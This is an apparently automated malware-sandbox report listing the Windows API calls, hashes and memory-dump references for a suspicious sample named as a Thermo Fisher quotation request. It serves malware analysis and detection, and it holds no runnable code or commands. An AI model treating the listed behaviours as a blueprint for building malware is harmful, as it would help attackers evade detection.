                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                              • String ID:
                                                              • API String ID: 1380811348-0
                                                              • Opcode ID: a2ebbabe84a32ef5ea7f7da2092aa8ee5e956185f1c0c918859b1c51bff681dc
                                                              • Instruction ID: b90b851d9c65a73030ab3864eb12c1df059a1ebc588992d9be94c1a86ed4f06f
                                                              • Opcode Fuzzy Hash: a2ebbabe84a32ef5ea7f7da2092aa8ee5e956185f1c0c918859b1c51bff681dc
                                                              • Instruction Fuzzy Hash: 82518FB1144300AFD724EF24D895EABB7EDEF88754F044A1EF98597291DB30D904CBA6
                                                              APIs
                                                                • Part of subcall function 00663C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00662BB5,?,?), ref: 00663C1D
                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006630AF
                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 006630EF
                                                              • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00663112
                                                              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0066313B
                                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0066317E
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0066318B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                              • String ID:
                                                              • API String ID: 3451389628-0
                                                              • Opcode ID: 45b18bee68e0f2c6f1cf387fba2bd3fd9f886d5044e1655220f658f169213c15
                                                              • Instruction ID: 16daf242f2932486136497e80656dbad0d8c52c744a24bf4f535ee1396a88af1
                                                              • Opcode Fuzzy Hash: 45b18bee68e0f2c6f1cf387fba2bd3fd9f886d5044e1655220f658f169213c15
                                                              • Instruction Fuzzy Hash: 91515871104300AFC748EF64C885EABBBEAFF89314F044A1DF555872A1DB31EA09CB56
                                                              APIs
                                                              • GetMenu.USER32(?), ref: 00668540
                                                              • GetMenuItemCount.USER32(00000000), ref: 00668577
                                                              • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0066859F
                                                              • GetMenuItemID.USER32(?,?), ref: 0066860E
                                                              • GetSubMenu.USER32(?,?), ref: 0066861C
                                                              • PostMessageW.USER32(?,00000111,?,00000000), ref: 0066866D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Menu$Item$CountMessagePostString
                                                              • String ID:
                                                              • API String ID: 650687236-0
                                                              • Opcode ID: e5a6d528e20661f8baf32db5bbfbf379cd3d099ad810b28cef0a04e416ebe29e
                                                              • Instruction ID: 4810eae0afc3370cd5b08963c3a27f46f8cc16fe83bfe65d301660d87c4bd186
                                                              • Opcode Fuzzy Hash: e5a6d528e20661f8baf32db5bbfbf379cd3d099ad810b28cef0a04e416ebe29e
                                                              • Instruction Fuzzy Hash: 0251BD71A00219AFCF55EF64C841AEEB7F6EF48310F108599E906FB391DB70AE418B95
                                                              APIs
                                                              • _memset.LIBCMT ref: 00644B10
                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00644B5B
                                                              • IsMenu.USER32(00000000), ref: 00644B7B
                                                              • CreatePopupMenu.USER32 ref: 00644BAF
                                                              • GetMenuItemCount.USER32(000000FF), ref: 00644C0D
                                                              • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00644C3E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                              • String ID:
                                                              • API String ID: 3311875123-0
                                                              • Opcode ID: bd0162f2530b25ae3758f1ac5c3a60ea13faa1a6cc833c475180e9c9b7993b5b
                                                              • Instruction ID: 1110e7e2e67e0d11768b5041e3cea1b6901fdb8ccfa0b675b60669258e09b988
                                                              • Opcode Fuzzy Hash: bd0162f2530b25ae3758f1ac5c3a60ea13faa1a6cc833c475180e9c9b7993b5b
                                                              • Instruction Fuzzy Hash: 6951CF70602219EFDF20CF68D8CABEDBBF6EF44318F184159E4159B291EB709945CB61
                                                              APIs
                                                              • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,0069DC00), ref: 00658E7C
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00658E89
                                                              • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00658EAD
                                                              • #16.WSOCK32(?,?,00000000,00000000), ref: 00658EC5
                                                              • _strlen.LIBCMT ref: 00658EF7
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00658F6A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$_strlenselect
                                                              • String ID:
                                                              • API String ID: 2217125717-0
                                                              • Opcode ID: 1c2e026b2ada0ac1afd42c882e8b1f8c4117899633c0aef6cbece4f6c487579f
                                                              • Instruction ID: 8d793cbcbc2536c8af0c440769439a553d5087396e1de8a5e1ab694d4e759f11
                                                              • Opcode Fuzzy Hash: 1c2e026b2ada0ac1afd42c882e8b1f8c4117899633c0aef6cbece4f6c487579f
                                                              • Instruction Fuzzy Hash: 3F419E71500204AFCB58EBA4C986EEEB7BBAF58311F104259F516A72D1DF30AE04CB64
                                                              APIs
                                                                • Part of subcall function 0061B34E: GetWindowLongW.USER32(?,000000EB), ref: 0061B35F
                                                              • BeginPaint.USER32(?,?,?), ref: 0061AC2A
                                                              • GetWindowRect.USER32(?,?), ref: 0061AC8E
                                                              • ScreenToClient.USER32(?,?), ref: 0061ACAB
                                                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0061ACBC
                                                              • EndPaint.USER32(?,?,?,?,?), ref: 0061AD06
                                                              • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0067E673
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                              • String ID:
                                                              • API String ID: 2592858361-0
                                                              • Opcode ID: 62f2dda349bc4047f610cb5549317a25da69583d1852350b7b3ea39dbf36ea75
                                                              • Instruction ID: 1b908c79f7b255923e4d79f0ecc3291336d615ed296481353ca0bf1feea44fa5
                                                              • Opcode Fuzzy Hash: 62f2dda349bc4047f610cb5549317a25da69583d1852350b7b3ea39dbf36ea75
                                                              • Instruction Fuzzy Hash: 5241D470105300AFC710DF65DC84FB67BBAEF5A320F08065DF9A48B2A2C3319985DBA2
                                                              APIs
                                                              • ShowWindow.USER32(006C1628,00000000,006C1628,00000000,00000000,006C1628,?,0067DC5D,00000000,?,00000000,00000000,00000000,?,0067DAD1,00000004), ref: 0066E40B
                                                              • EnableWindow.USER32(00000000,00000000), ref: 0066E42F
                                                              • ShowWindow.USER32(006C1628,00000000), ref: 0066E48F
                                                              • ShowWindow.USER32(00000000,00000004), ref: 0066E4A1
                                                              • EnableWindow.USER32(00000000,00000001), ref: 0066E4C5
                                                              • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0066E4E8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Window$Show$Enable$MessageSend
                                                              • String ID:
                                                              • API String ID: 642888154-0
                                                              • Opcode ID: 1b8bad6182adf73f47cb2975bdd25e52de8b7d0172291d8cd75ffdbef6355589
                                                              • Instruction ID: e42c54904558602db4d0adc0a307106447469ac5ecc7010b2a2793863bc4a985
                                                              • Opcode Fuzzy Hash: 1b8bad6182adf73f47cb2975bdd25e52de8b7d0172291d8cd75ffdbef6355589
                                                              • Instruction Fuzzy Hash: 1D414138601145EFDB26CF34C499BD47BE2BF09704F5841A9EA598F2A2CB32AC45CB61
                                                              APIs
                                                              • InterlockedExchange.KERNEL32(?,000001F5), ref: 006498D1
                                                                • Part of subcall function 0061F4EA: std::exception::exception.LIBCMT ref: 0061F51E
                                                                • Part of subcall function 0061F4EA: __CxxThrowException@8.LIBCMT ref: 0061F533
                                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00649908
                                                              • EnterCriticalSection.KERNEL32(?), ref: 00649924
                                                              • LeaveCriticalSection.KERNEL32(?), ref: 0064999E
                                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 006499B3
                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 006499D2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
                                                              • String ID:
                                                              • API String ID: 2537439066-0
                                                              • Opcode ID: ca769dd06bc3978dd5b640acd8fb49cffdfc9d01819b42b7011879fae26be8d1
                                                              • Instruction ID: 25653aad7a51913955c7700fb7d55cacf062dccf772d306582830ff65e41b811
                                                              • Opcode Fuzzy Hash: ca769dd06bc3978dd5b640acd8fb49cffdfc9d01819b42b7011879fae26be8d1
                                                              • Instruction Fuzzy Hash: C1317031900105ABDB50EF95DC85EABBBBAFF45310B1881A9F904AB286D734DA50DBA4
                                                              APIs
                                                              • GetForegroundWindow.USER32(?,?,?,?,?,?,006577F4,?,?,00000000,00000001), ref: 00659B53
                                                                • Part of subcall function 00656544: GetWindowRect.USER32(?,?), ref: 00656557
                                                              • GetDesktopWindow.USER32 ref: 00659B7D
                                                              • GetWindowRect.USER32(00000000), ref: 00659B84
                                                              • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00659BB6
                                                                • Part of subcall function 00647A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00647AD0
                                                              • GetCursorPos.USER32(?), ref: 00659BE2
                                                              • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00659C44
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                              • String ID:
                                                              • API String ID: 4137160315-0
                                                              • Opcode ID: c226b219e0c8fdf2eaeb8d58ed2c459680920861577b1a00799e3dcd8aac3015
                                                              • Instruction ID: 8687cba37edbd3897716b101646aa5ca00a41b5978e991087395055108e2e412
                                                              • Opcode Fuzzy Hash: c226b219e0c8fdf2eaeb8d58ed2c459680920861577b1a00799e3dcd8aac3015
                                                              • Instruction Fuzzy Hash: 0631C172104309ABD710DF14D849F9BB7EAFF89314F000A1AF985D7281D671E948CBA2
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 0063AFAE
                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 0063AFB5
                                                              • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 0063AFC4
                                                              • CloseHandle.KERNEL32(00000004), ref: 0063AFCF
                                                              • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0063AFFE
                                                              • DestroyEnvironmentBlock.USERENV(00000000), ref: 0063B012
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                              • String ID:
                                                              • API String ID: 1413079979-0
                                                              • Opcode ID: de59642362b914f535eefda9305a9cfe8e5e52e0432977d29e76c31d46c35029
                                                              • Instruction ID: f46b5da9d76c082e8bb5899515c6698947b798387c916a07b17562f04591085b
                                                              • Opcode Fuzzy Hash: de59642362b914f535eefda9305a9cfe8e5e52e0432977d29e76c31d46c35029
                                                              • Instruction Fuzzy Hash: 64215E72100209BFDF129F94DD09FEE7BAAEF44344F145119FA41A21A1C3769D21EBA1
                                                              APIs
                                                                • Part of subcall function 0061AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0061AFE3
                                                                • Part of subcall function 0061AF83: SelectObject.GDI32(?,00000000), ref: 0061AFF2
                                                                • Part of subcall function 0061AF83: BeginPath.GDI32(?), ref: 0061B009
                                                                • Part of subcall function 0061AF83: SelectObject.GDI32(?,00000000), ref: 0061B033
                                                              • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0066EC20
                                                              • LineTo.GDI32(00000000,00000003,?), ref: 0066EC34
                                                              • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0066EC42
                                                              • LineTo.GDI32(00000000,00000000,?), ref: 0066EC52
                                                              • EndPath.GDI32(00000000), ref: 0066EC62
                                                              • StrokePath.GDI32(00000000), ref: 0066EC72
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                              • String ID:
                                                              • API String ID: 43455801-0
                                                              • Opcode ID: c4f5e496ee5bc32615eb079498c3a46edf905cf46feecbe384a11bb06f1765bf
                                                              • Instruction ID: 482bc4b1f4f0d44762ddec79abf7bf4f35730c5831c62beb5f6580b4b69557e6
                                                              • Opcode Fuzzy Hash: c4f5e496ee5bc32615eb079498c3a46edf905cf46feecbe384a11bb06f1765bf
                                                              • Instruction Fuzzy Hash: A6111B7600014DBFEF129F90DC88EEA7F6EEF09354F048112BE18991A1D7719E55DBA0
                                                              APIs
                                                              • GetDC.USER32(00000000), ref: 0063E1C0
                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 0063E1D1
                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0063E1D8
                                                              • ReleaseDC.USER32(00000000,00000000), ref: 0063E1E0
                                                              • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0063E1F7
                                                              • MulDiv.KERNEL32(000009EC,?,?), ref: 0063E209
                                                                • Part of subcall function 00639AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00639A05,00000000,00000000,?,00639DDB), ref: 0063A53A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: CapsDevice$ExceptionRaiseRelease
                                                              • String ID:
                                                              • API String ID: 603618608-0
                                                              • Opcode ID: 4fd45d618be5a7bf5861fe703bcbd46a9e80f17627ff64abc3beca1ae0aee41a
                                                              • Instruction ID: 9e87820525159fd69bf353714d917eadc6ff8ed2c0cec1ae457315454552e32c
                                                              • Opcode Fuzzy Hash: 4fd45d618be5a7bf5861fe703bcbd46a9e80f17627ff64abc3beca1ae0aee41a
                                                              • Instruction Fuzzy Hash: C10171B5A40219BBEB109BA58C45A5ABFBAEB48351F004166EA04A73D0D6719C008BB0
                                                              APIs
                                                              • __init_pointers.LIBCMT ref: 00627B47
                                                                • Part of subcall function 0062123A: __initp_misc_winsig.LIBCMT ref: 0062125E
                                                                • Part of subcall function 0062123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00627F51
                                                                • Part of subcall function 0062123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00627F65
                                                                • Part of subcall function 0062123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00627F78
                                                                • Part of subcall function 0062123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00627F8B
                                                                • Part of subcall function 0062123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00627F9E
                                                                • Part of subcall function 0062123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00627FB1
                                                                • Part of subcall function 0062123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00627FC4
                                                                • Part of subcall function 0062123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00627FD7
                                                                • Part of subcall function 0062123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00627FEA
                                                                • Part of subcall function 0062123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00627FFD
                                                                • Part of subcall function 0062123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00628010
                                                                • Part of subcall function 0062123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00628023
                                                                • Part of subcall function 0062123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00628036
                                                                • Part of subcall function 0062123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00628049
                                                                • Part of subcall function 0062123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0062805C
                                                                • Part of subcall function 0062123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 0062806F
                                                              • __mtinitlocks.LIBCMT ref: 00627B4C
                                                                • Part of subcall function 00627E23: InitializeCriticalSectionAndSpinCount.KERNEL32(006BAC68,00000FA0,?,?,00627B51,00625E77,006B6C70,00000014), ref: 00627E41
                                                              • __mtterm.LIBCMT ref: 00627B55
                                                                • Part of subcall function 00627BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00627B5A,00625E77,006B6C70,00000014), ref: 00627D3F
                                                                • Part of subcall function 00627BBD: _free.LIBCMT ref: 00627D46
                                                                • Part of subcall function 00627BBD: DeleteCriticalSection.KERNEL32(006BAC68,?,?,00627B5A,00625E77,006B6C70,00000014), ref: 00627D68
                                                              • __calloc_crt.LIBCMT ref: 00627B7A
                                                              • GetCurrentThreadId.KERNEL32 ref: 00627BA3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                              • String ID:
                                                              • API String ID: 2942034483-0
                                                              • Opcode ID: 8f6f6895db56c83319cfebe453e1a893624daaf0ff20a68f2af3288cc4375fd5
                                                              • Instruction ID: 159ef44e2a7b5b34bd31fc4ec03c13c3546c1d637cb6ce8f29930a05ae1ee1ae
                                                              • Opcode Fuzzy Hash: 8f6f6895db56c83319cfebe453e1a893624daaf0ff20a68f2af3288cc4375fd5
                                                              • Instruction Fuzzy Hash: 3AF0963250DF3229E7A47B75BC46E8A26979F01731F21179DF8A0C51D1FF2198414D79
                                                              APIs
                                                              • MapVirtualKeyW.USER32(0000005B,00000000), ref: 0060281D
                                                              • MapVirtualKeyW.USER32(00000010,00000000), ref: 00602825
                                                              • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00602830
                                                              • MapVirtualKeyW.USER32(000000A1,00000000), ref: 0060283B
                                                              • MapVirtualKeyW.USER32(00000011,00000000), ref: 00602843
                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0060284B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Virtual
                                                              • String ID:
                                                              • API String ID: 4278518827-0
